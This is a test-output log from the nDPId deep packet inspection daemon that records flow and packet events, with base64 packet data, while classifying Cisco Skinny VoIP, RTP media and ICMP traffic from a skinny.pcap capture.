+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.195.50","src_port":32144,"dst_port":17718,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1317801134323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134323,"pkt":"AB1FDGVjAB56JnR1CABFuADIE4QAAEARXivAqMM6wKjDMn2QRTYAtIyXgIAFnAAC4MD2v1fc\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/39+\/v18ffz+\/f9+\/n17eXh6e357fv1+\/v59\/fx9fX16e379+vv7+359fnv\/\/X3+\/35\/e3v+\/H7\/fnv+fXz9\/v7+fX18fHx7fHt+f3\/\/fv3+f\/7+\/v79\/\/5\/eXt8fX9+f\/\/\/\/39+f3x5e3x6eX1+fv5+f\/78\/P78\/nz+fn5+fA=="} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1317801134342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134342,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4UAAEARYETAqMM6wKjBGH2WJLMAtJrugAAFnAAC4WD2v1fifX38\/v34\/Pr7f\/9+fnl2eHv\/\/f3+fH5\/ff5\/\/v17fHx6fH1+\/Pt+\/39+\/v\/9f\/\/+fv59e357enx7fX1+\/f78+359fXt6\/\/19\/Pv\/\/X97fP79\/v7+\/3t4e3x8\/\/3+\/f\/8+Px\/fHh4d3l8ff5\/eHt9\/vr7+Pn9fnp6eHl7fP37+vz8\/P38fv3+eHp3c3d6fn7\/\/nz8\/P77\/fv+\/ff++\/t7+w=="} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1317801134342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134342,"pkt":"AB1FDGVjAB56JnR1CABFuADIE4YAAEARXinAqMM6wKjDMn2QRTYAtHhcgAAFnQAC4WD2v1fcfX38\/v34\/Pr7f\/9+fnl2eHv\/\/f3+fH5\/ff5\/\/v17fHx6fH1+\/Pt+\/39+\/v\/9f\/\/+fv59e357enx7fX1+\/f78+359fXt6\/\/19\/Pv\/\/X97fP79\/v7+\/3t4e3x8\/\/3+\/f\/8+Px\/fHh4d3l8ff5\/eHt9\/vr7+Pn9fnp6eHl7fP37+vz8\/P38fv3+eHp3c3d6fn7\/\/nz8\/P77\/fv+\/ff++\/t7+w=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134348,"flow_last_seen":1317801134348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134348,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17726,"dst_port":9399,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1317801134348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134348,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+YAAEARX+vAqMMywKjBGEU+JLcAtEN5gIAGQwAFh3h8EHHo\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f358fX17fv96f\/18fX7+\/X9+fn\/+fHz\/fX5\/fn9+\/39+\/\/7+fv7\/fX17fP56d3h6\/X17eXh8fH\/9fnp5ffr2+\/79\/f3+\/3x4eXx6eHx5eX56fH5+f3t+fXp8fH98ffx+\/3t7+n57ff76\/v9\/fH39f3p9fX58ev5+fHp8+Pn8\/Q=="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134348,"flow_last_seen":1317801134348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134348,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17726,"dst_port":9399,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134349,"flow_last_seen":1317801134349,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134349,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32152,"dst_port":9396,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1317801134349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134349,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4cAAEARYELAqMM6wKjBGH2YJLQAtKCZgIAFlAAFh3geBjsi\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f358fX17fv96f\/18fX7+\/X9+fn\/+fHz\/fX5\/fn9+\/39+\/\/7+fv7\/fX17fP56d3h6\/X17eXh8fH\/9fnp5ffr2+\/79\/f3+\/3x4eXx6eHx5eX56fH5+f3t+fXp8fH98ffx+\/3t7+n57ff76\/v9\/fH39f3p9fX58ev5+fHp8+Pn8\/Q=="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134349,"flow_last_seen":1317801134349,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134349,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32152,"dst_port":9396,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1317801134362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134362,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4gAAEARYEHAqMM6wKjBGH2WJLMAtPMngAAFnQAC4gD2v1fi\/H3+end3dHZ1dHp8ffz6\/f9+eXv8\/vr4+\/v8\/fz7\/Pv5fnx5d3x2dv\/++\/n7+fr7+\/9+fnt3dHVzdHZ5fnt8\/f\/+\/Pz6\/n\/7\/f35\/vz3\/n\/9f3\/\/fXp7e3t8fH16d3l8fX\/+fX\/+fH58e359\/vr6+Px8fnz++P39\/H59fXx8e3h5d3V7fn78\/f319\/r6+\/n9f\/19f3x1eHhydXd6\/v\/8\/A=="} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1317801134368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134368,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+gAAEARX+nAqMMywKjBGEU+JLcAtNjtgAAGRAAFiBh8EHHof\/79+v56fX1+fHl7en3\/fHx+\/f7+\/n58f\/9\/fnp7fvz6\/\/\/+\/Pt+\/nx5e3x9fP9+fH18fnp7fHx+eX3+\/f1+fv37\/Hx7\/n7+\/nz9fXt9fv59eHp\/e39+eX17fn3+\/337\/\/v+f\/p9\/v18\/\/9+fXx7e317ff5+fHt9fn5+f37\/\/H99ff77+v5+fn76\/X5+e39\/fv59fXz\/\/H58enr+fH17dg=="} +00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1317801134369,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134369,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4oAAEARYD\/AqMM6wKjBGH2YJLQAtDYOgAAFlQAFiBgeBjsif\/79+v56fX1+fHl7en3\/fHx+\/f7+\/n58f\/9\/fnp7fvz6\/\/\/+\/Pt+\/nx5e3x9fP9+fH18fnp7fHx+eX3+\/f1+fv37\/Hx7\/n7+\/nz9fXt9fv59eHp\/e39+eX17fn3+\/337\/\/v+f\/p9\/v18\/\/9+fXx7e317ff5+fHt9fn5+f37\/\/H99ff77+v5+fn76\/X5+e39\/fv59fXz\/\/H58enr+fH17dg=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134383,"flow_last_seen":1317801134383,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134383,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17732,"dst_port":9400,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1317801134383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134383,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+sAAEARX+bAqMMywKjBGEVEJLgAtEqsgAAGPwAC4qB8EHHz\/Pn+\/Pr9\/Xt+fnd9enn9e338\/fp+f\/n8\/f79\/n5+enh5eHl8fX5\/\/v95fv5\/\/P36\/n1\/fvr6\/P1\/\/f7\/\/315d3l3eXp7\/3x6fX5+fnl7\/H5\/\/n7+fXx+fv7+f37+\/v75+Pr09fn2+359eHd3c3Z5dXh9fP78fvz5\/vv8ff7+fX9\/fv3+\/nx5e3h1d3Z4eXh6\/\/z6+\/79\/X17fv5+\/\/\/9+g=="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134383,"flow_last_seen":1317801134383,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134383,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17732,"dst_port":9400,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1317801134388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134388,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+wAAEARX+XAqMMywKjBGEU+JLcAtDLhgAAGRQAFiLh8EHHofHt9f319fPv+\/v54f\/7\/e3l9e\/79f3p7fn18e316ff5+\/X58fv1\/\/v9+f3p+f31\/fv3+f31+\/np6fnx8fnz9\/P\/8fv37ff3\/fH7+\/3v\/f318f\/t8fP19fH19\/fl\/ev39+fx9d3Fw+NlhW8pMTLpRPsLeSefcWnbk8lz61FL72VV96Wtf6+1j6G777m\/scn\/3eX7+cXDubGz2fnF77nN2\/A=="} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1317801134389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134389,"pkt":"ABTy5fxCAB56JnR1CABFuADIE40AAEARYDzAqMM6wKjBGH2YJLQAtJABgAAFlgAFiLgeBjsifHt9f319fPv+\/v54f\/7\/e3l9e\/79f3p7fn18e316ff5+\/X58fv1\/\/v9+f3p+f31\/fv3+f31+\/np6fnx8fnz9\/P\/8fv37ff3\/fH7+\/3v\/f318f\/t8fP19fH19\/fl\/ev39+fx9d3Fw+NlhW8pMTLpRPsLeSefcWnbk8lz61FL72VV96Wtf6+1j6G777m\/scn\/3eX7+cXDubGz2fnF77nN2\/A=="} +00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1317801134403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134403,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+4AAEARX+PAqMMywKjBGEVEJLgAtCDKgAAGQAAC40B8EHHz+vv9\/f7+\/nx6eXh7ff\/9\/fb4+vj5+f5+fHh8eHd5en5++\/39\/Xt\/enl7eH54efr+\/Pp9f3p5fHV4enp\/\/Pj59vn+9vb8fHl6d3t5ev5\/\/P768\/n5+f7+fHV1dnR6fXd8\/31\/eHr+eX39d3n4\/f73+Pz8\/3t7e3p2dn59fPv5+\/v4\/X\/8fH18e39+fv78\/fv59\/b7\/nx7fXh3d3p\/fHt9fg=="} +00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1317801134423,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134423,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE\/EAAEARX+DAqMMywKjBGEVEJLgAtBwlgAAGQQAC4+B8EHHzfn78fXn\/eXV9d3b9\/338+\/f7fH59e3p2eX3++\/309fz6e3l6c3h3dnt3fff49\/Pz9vf2+Pv9fX19fX1+\/f1\/e3l5d3d1dHh6fHp6fv7++\/r3+H59fHx9e3l9+\/99\/P37+X57e3l8e3p\/f379\/fv7+\/r8\/v\/8\/n7\/\/\/39fXx6dnd5ev9+eXx6eH16fPx\/\/Pj5+fv7\/H15d3l7fH7\/\/f39\/A=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2643,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801140764,"flow_last_seen":1317801140764,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1317801140764,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"10.16.2.25","src_port":50917,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2643,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1317801140764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1317801140764,"pkt":"ABTy5fxCAB56JnR1CABFYAA0F0wAAEAG0wzAqMM6ChACGcblB9CCZg4uo3beQVAYIAAasgAABAAAAAAAAAAAAAAA"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2643,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801140764,"flow_last_seen":1317801140764,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1317801140764,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"10.16.2.25","src_port":50917,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2664,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1317801140821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317801140821,"pkt":"AB56JnR1ABTy5fxCCABFYAAod8dAADwGNp0KEAIZwKjDOgfQxuWjdt5BgmYOOlAQFtAn6gAAAAAAAAAA"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2941,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801141463,"flow_last_seen":1317801141463,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1317801141463,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.195.58","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2941,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1317801141463,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1317801141463,"pkt":"AB56JnR1AB1FDGVjCABFAAA4GBEAAEABWvbAqMMywKjDOgMDmwIAAAAARbgAyBe5AABAEVn2wKjDOsCowzJ9kEU2ALSefw=="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2941,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801141463,"flow_last_seen":1317801141463,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1317801141463,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.195.58","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.235927} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1317801141463,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1317801141463,"pkt":"AB56JnR1AB1FDGVjCABFAAA4GBEAAEABWvbAqMMywKjDOgMDmwIAAAAARbgAyBe5AABAEVn2wKjDOsCowzJ9kEU2ALSefw=="} +00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1317801141463,"flow_last_seen":1317801141463,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.195.58","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1317801130501,"flow_last_seen":1317801141627,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":52,"midstream":1,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.12","src_port":49399,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1317801130506,"flow_last_seen":1317801153428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":2312,"flow_avg_l4_payload_len":52,"midstream":1,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.193.12","dst_ip":"192.168.195.50","src_port":2000,"dst_port":51532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":355,"flow_first_seen":1317801134348,"flow_last_seen":1317801141428,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":61060,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17726,"dst_port":9399,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1317801134383,"flow_last_seen":1317801141423,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":60716,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17732,"dst_port":9400,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":1317801134322,"flow_last_seen":1317801141602,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":62780,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32150,"dst_port":9395,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":356,"flow_first_seen":1317801134349,"flow_last_seen":1317801141449,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":61232,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32152,"dst_port":9396,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1317801134322,"flow_last_seen":1317801141602,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":248024,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.195.50","src_port":32144,"dst_port":17718,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1317801140764,"flow_last_seen":1317801140821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"10.16.2.25","src_port":50917,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} 